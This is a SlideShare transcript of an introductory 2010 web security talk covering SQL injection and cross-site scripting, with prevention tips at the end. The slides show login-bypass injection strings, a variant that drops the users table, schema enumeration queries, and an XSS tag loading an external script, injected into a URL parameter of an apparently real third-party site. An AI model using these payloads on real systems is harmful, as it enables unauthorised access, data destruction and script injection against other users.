Web security 2010

263 views
229 views

Published on

One of my short presentation on web security. (Demo)
- Sql injection
- Cross site scripting.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
263
On SlideShare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
10
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Web security 2010

  1. 1. Software Security
  2. 2. What is software Security? • Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application, .
  3. 3. Why Software security is important?  Leakage of Sensitive data.  Crash of entire application or database.   Fixing issues after the attack will be more expensive and time consuming. Quality of the product.
  4. 4. Common vulnerabilities in web application  SQL Injection  Cross-Site Scripting(XSS)  Buffer overflows  HTTP response splitting
  5. 5. 2010 statistics of web Vulnerability
  6. 6. What is SQL injection?  SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
  7. 7. How it works?
  8. 8. Demonstration
  9. 9. Login using SQL injection  "SELECT * FROM users WHERE name = ' " + userName + " ' AND password = ' “+Password+“ ';"
  10. 10.  a' or 't'='t  1' or 1=1
  11. 11.  SELECT * FROM users WHERE name = ' ' AND password = ' ' ;     SELECT * FROM users WHERE name = 'admin' AND password = 'pass123' ; SELECT * FROM users WHERE name = ' a' OR 't'='t ' AND password = ' a' OR 't'='t '; SELECT * FROM users WHERE name = ' a' OR 't'='t ' AND password = ' a' OR 't'='t '; DROP TABLE users; - -';
  12. 12. More exploits using SQL injection   SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='customers'
  13. 13. XSS( Cross-Site Scripting)
  14. 14. Cross-site Scripting  Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.
  15. 15. How it works Script Injection     Same as before, but instead of placing code in URL, script code is saved on the application website and stored in database using their own non-validated forms When that data is retrieved from database and users load that webpage the code executes and attack occurs User would never know the code was executed without viewing the source of each webpage, since the link looks valid The application website owner is potentially liable since the attack code is stored on their site
  16. 16.  <SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  17. 17. http://www.easydoc.com.au/test/personalprofile.action ?address1= &suburb= &state= &zipcode=1 &homePhone= &mobilenumber= &reminderOption=0 &title=Dr &firstname=<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT> &lastname=Doctor &photoupload= &smsOption=0 &type=GP &reqNo=82
  18. 18. Preventing SQL injection and XSS  SCRUB Error handling Error messages divulge information that can be used by hacker  VALIDATE all user entered parameters  CHECK data types and lengths  DISALLOW unwanted data (e.g. HTML tags, JavaScript)  ESCAPE questionable characters (ticks, --,semi-colon, brackets, etc.)
  19. 19. Thank You

×